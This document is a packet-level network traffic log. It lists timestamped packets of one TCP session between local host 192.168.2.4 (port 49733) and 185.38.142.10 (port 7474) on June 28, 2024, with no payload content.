Jun 28, 2024 08:58:02.415527105 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415530920 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.415543079 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415580034 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.415997982 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.416050911 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.416766882 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.417171001 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.417423964 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.417428970 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.417489052 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.417504072 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.417509079 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.417558908 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.417663097 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.417668104 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.417768002 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.417799950 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.417804956 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.417855978 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418121099 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418220043 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418237925 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418270111 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418275118 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418279886 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418317080 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418322086 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418328047 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418382883 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418405056 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418543100 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418548107 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418627977 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418632030 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418641090 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418646097 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418679953 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418684959 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418700933 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418704987 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418705940 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418735981 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418749094 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418915033 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418920040 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418929100 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418934107 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418942928 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418946981 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418951035 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418958902 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418968916 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418972969 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418977976 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.418991089 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.418997049 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419006109 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419008970 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419018984 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419040918 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419054985 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419059992 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419084072 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419112921 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419183969 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419189930 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419198990 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419241905 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419241905 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419245958 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419255972 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419255972 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419260025 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419272900 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419317961 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419317961 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419323921 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419333935 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419342041 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419348001 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419358015 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419374943 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419390917 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419404030 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419409037 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419428110 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419442892 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419446945 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419450998 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419469118 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419501066 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419743061 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419749022 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419751883 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419755936 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419759989 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419764042 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419775009 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419779062 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419783115 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419786930 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419796944 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419800997 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419805050 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419817924 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419822931 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419826984 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419830084 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419841051 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419843912 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419848919 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419858932 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419863939 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419878006 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419882059 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419883013 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419902086 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419907093 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419929981 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.419946909 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419955015 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.419958115 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420002937 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420002937 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420007944 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420058966 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420063972 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420069933 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420073032 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420087099 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420090914 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420099974 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420124054 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420139074 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420144081 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420160055 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420183897 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420190096 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420202017 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420238972 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420243025 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420244932 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420277119 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420280933 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420289993 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420300007 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420337915 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420350075 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420351982 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420356989 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420392990 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420397043 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420401096 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420404911 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420456886 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420929909 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420934916 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420943975 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420948029 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420957088 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420960903 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420964003 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420968056 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420978069 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420981884 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420984983 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420989037 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420989990 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.420993090 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.420998096 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421001911 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421005964 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421015024 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421019077 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421022892 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421025038 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.421031952 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421036959 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421046019 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421050072 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421108961 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:02.421159029 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421164989 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421174049 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421179056 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421188116 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421192884 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421197891 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421206951 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421211004 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421220064 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421224117 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421232939 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421236992 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421240091 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421250105 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421255112 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421263933 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421267986 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421278000 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421293020 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421297073 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421305895 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421309948 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421400070 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421422958 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421427011 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421436071 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421468019 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421472073 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421513081 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421516895 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421525955 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421646118 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421649933 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421653032 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421657085 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421659946 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421664000 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421669960 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421735048 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421785116 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421788931 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421797991 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421802998 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421842098 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421890020 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421895027 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421905994 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421952009 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.421956062 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422087908 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422092915 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422441959 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422538042 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422801018 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422895908 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422899008 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422909021 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422949076 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422954082 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.422964096 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423129082 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423132896 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423142910 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423146963 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423156977 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423160076 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423177004 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423181057 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423190117 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423196077 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423230886 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423337936 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423342943 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423357964 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423366070 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423368931 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423378944 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423402071 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423405886 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423413992 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423459053 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423464060 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423472881 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423548937 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423595905 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423631907 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423636913 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423640966 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423693895 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423698902 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423749924 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423861027 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423906088 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423909903 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423918962 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423928022 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423930883 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.423933983 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424026012 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424031019 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424040079 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424043894 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424056053 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424060106 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424065113 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424143076 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424148083 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424156904 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424163103 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424243927 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424247980 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424391031 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424400091 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424407005 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424410105 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424458027 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424463034 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424562931 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424602032 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424606085 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424609900 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424613953 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424618006 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424746990 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424751043 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424761057 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424765110 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424773932 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424777985 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424837112 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424841881 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424850941 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424899101 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424902916 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424912930 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424933910 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424938917 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.424947977 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.425014019 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.425018072 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.425052881 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.425056934 CEST	7474	49733	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:02.425066948 CEST	7474	49733	185.38.142.10	192.168.2.4
